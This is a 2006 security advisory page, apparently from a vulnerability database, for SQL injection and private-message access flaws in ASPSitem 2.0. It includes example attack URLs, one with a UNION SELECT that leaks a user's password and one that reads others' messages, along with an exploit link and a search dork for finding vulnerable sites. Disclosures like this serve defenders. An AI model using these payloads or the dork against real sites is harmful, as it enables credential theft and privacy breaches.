ASPSitem <= 2.0 Multiple Vulnerabilities.

2006-06-05 / 2006-06-06
Credit: Mustafa Can Bjorn
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-2794 | CVE-2006-2793
CWE: N/A

--Security Report-- Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 08:26 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: ASPSitem (http://www.aspsitem.com) Version: 2.0 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to bid parameter in Anket.asp. Remote attacker also can read others private messages.The parameter id in Hesabim.asp did not sanitized properly for checking the owner status of private message. Level: Critical --- How&Example: SQL injection -> GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0 %20from%20uyeler%20where%20 id%20like%201 with this example remote attacker can leak userid 1's login information from database. Read others private messages -> GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusernam e --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. * 27/05/2006: Vendor already released patch for SQL injection you can find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710 -- Exploit: http://www.nukedx.com/?getxpl=39 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 --- Dorks: "Te?ekkr ASPSitem"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top